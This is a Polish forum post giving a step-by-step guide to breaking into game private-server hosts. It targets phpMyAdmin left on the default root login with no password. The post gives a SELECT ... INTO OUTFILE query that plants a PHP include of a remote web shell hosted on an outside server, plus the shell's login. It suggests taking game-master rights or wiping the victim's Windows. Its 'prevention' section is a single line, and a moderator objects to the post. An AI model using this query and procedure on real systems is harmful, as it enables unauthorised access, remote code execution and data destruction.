Jak hakować dzięki shellcode i jak temu zapobiec!

Baza wyszukanych fraz

Blog srebro

Jak hakować dzięki shellcode i jak temu zapobiec!
  Witam,

Zauważyłem ostatnio, że dużo osób pada ofiarami hakerów przez Shellcode. A więc chciał bym napisać poradnik jak zapobiec takim wła¶nie atakom i też jak tego dokonać, wył±cznie w celach edukacyjnych. Poradnik podziele na 2 etapy, czyli jak dokonać ataku i jak mu zapobiec.

Czę¶ć 1 – Wgrywanie Shella

A więc co będzie nam potrzebne:

• Shellcode (zazwyczaj trudno znaleĽć, lecz oszczędziłem wam szukania.)
• Accmaker bez okre¶lonych zabezpieczeń.
• Troszeczke czasu.

Żeby dokonać ataku trzeba znaleĽć sobie jakiego¶ accmakera do jakiego¶ otsa. A więc wchodzimy na [Tylko pełnoprawni użytkownicy (z aktywacj± e-mailem) mog± widzieć linki.] Kliknij tutaj, aby się zarejestrować. i szukamy jakiego¶ otsa z luk± zabezpieczeń. Wybieramy pierwszy lepszy (i tak większo¶ć ma t± luke) czyli np. ten [Tylko pełnoprawni użytkownicy (z aktywacj± e-mailem) mog± widzieć linki.] Kliknij tutaj, aby się zarejestrować. Przechodzimy do phpmyadmin czyli link wyglada teraz tak [Tylko pełnoprawni użytkownicy (z aktywacj± e-mailem) mog± widzieć linki.] Kliknij tutaj, aby się zarejestrować. otwiera nam się okienko do którego trzeba znać login i hasło.

Podstawowe to
Login: Root
Password:

http://img121.imageshack.us/img121/7121/13157776.jpg

Bez hasła, jeżeli weszli¶my to jest to już połowa sukcesu, teraz klikamy na Okienko zapytania i wklejamy to zapytanie:

[Tylko pełnoprawni użytkownicy (z aktywacj± e-mailem) mog± widzieć linki.] Kliknij tutaj, aby się zarejestrować.

select '<?php include("http://www.shell.za.pl/hauru.txt"); ?>' into outfile
'C:/Program files/WebServ/phpmyadmin/mysql.php'

Zielony: To jest ¶cieżka tam gdzie zainstalowany jest Webserver, Ja podałem oryginaln±, lecz ona może być inna, trzeba j± odgadn±ć.

Niebieski: tutaj możemy dać co chcemy np. blad1.php albo blad2.php zależnie od naszego upodobania.

Klikamy „wy¶lij” i poszło je¶li zobaczymy odpowiedz Zapytanie SQL zostało wykonane pomy¶lnie (Wykonanie zapytania trwało 0.0189 sekund(y))
Znaczy, że zapytanie zostało pomy¶lnie wysłane więc scieżka się zgadza do Webservera. Mamy już Shella na kompie ofiary pozostaje nam teraz pogrzebać w Jego kompie. Na Shella wchodzimy poprzez dopisanie do linku to co jest na niebiesko może być to co chcesz, jak mówiłem ja dałem mysql czyli wchodze na Shella takim oto linkiem [Tylko pełnoprawni użytkownicy (z aktywacj± e-mailem) mog± widzieć linki.] Kliknij tutaj, aby się zarejestrować. otwiera nam się okienko do, którego wpisujemy login i hasło

Login: devilteam
Password: devilteam

http://img515.imageshack.us/img515/8412/68930116.jpg

I teraz możemy przeszukać kompa ofiary, najlepiej to wyszukać tam gdzie ma ots’a i zrobić sobie GMa czy co¶ albo ogólnie usun±ć mu windowsa (nie polecam)

Czę¶ć 2 – Jak zapobiec (krótki)

Napisze teraz jak zapobiec temu. Otóż jest to bardzo proste wystarczy zmienić hasło do phpmyadmina na jakie¶ trudniejsze.

Pozdrawiam,
Relisek

.moderator{ background-color: transparent; border-left: 4px solid #292e13; border-right: 1px dotted #292e13; border-top: 1px dotted #292e13; border-bottom: 1px dotted #292e13; padding: 4px; padding-left: 25px; background: #93A063 url(http://i47.tinypic.com/mvmaa1.gif) center left no-repeat; margin: 0px auto 8px auto;} Notka moderatorska: Takie poradniki to nie na tym forum
  • zanotowane.pl
  • doc.pisz.pl
  • pdf.pisz.pl
  • marcinkiewicz.opx.pl